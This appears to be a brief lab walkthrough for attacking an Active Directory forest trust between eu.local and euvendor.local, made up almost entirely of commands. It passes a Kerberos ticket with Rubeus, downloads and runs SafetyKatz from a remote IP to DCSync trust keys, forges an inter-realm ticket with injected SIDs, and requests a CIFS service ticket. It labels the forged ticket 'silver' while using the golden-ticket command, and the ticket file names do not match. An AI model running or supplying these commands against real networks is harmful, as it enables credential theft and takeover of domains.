First let’s login as admin

.\Rubeus.exe asktgt /user:Administrator /domain:eu.local /aes256:4e7ba210b76d807429e7ad8b210e103528dcf5db8b9de6b411bf593269955a6d /ptt

Let’s validate that we got the ticket

klist

Now let’s Dump the trust keys

.\Loader.exe -Path <http://192.168.100.36/SafetyKatz.exe> -Args '"lsadump::dcsync /user:eu\euvendor$ /domain:eu.local'

Now let’s go and create silver ticket

.\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:eu.local /sid:S-1-5-21-3657428294-2017276338-1274645009 /rc4:95b3e0347f5874530ff44ef89444cb98 /service:krbtgt /target:euvendor.local /sids:S-1-5-21-4066061358-3942393892-617142613-1103 /ticket:C:\Users\Public\euvendornet.kirbi" "exit"

Now let’s use Rubeus.exe to ask for TGS

.\Rubeus.exe asktgs /ticket:sharedwitheu.kirbi /service:CIFS/euvendor-dc.euvendor.local /dc:euvendor-dc.euvendor.local /ptt

Now let’s validate the Ticket

klist

Now let’s try to view the share on euvendor.local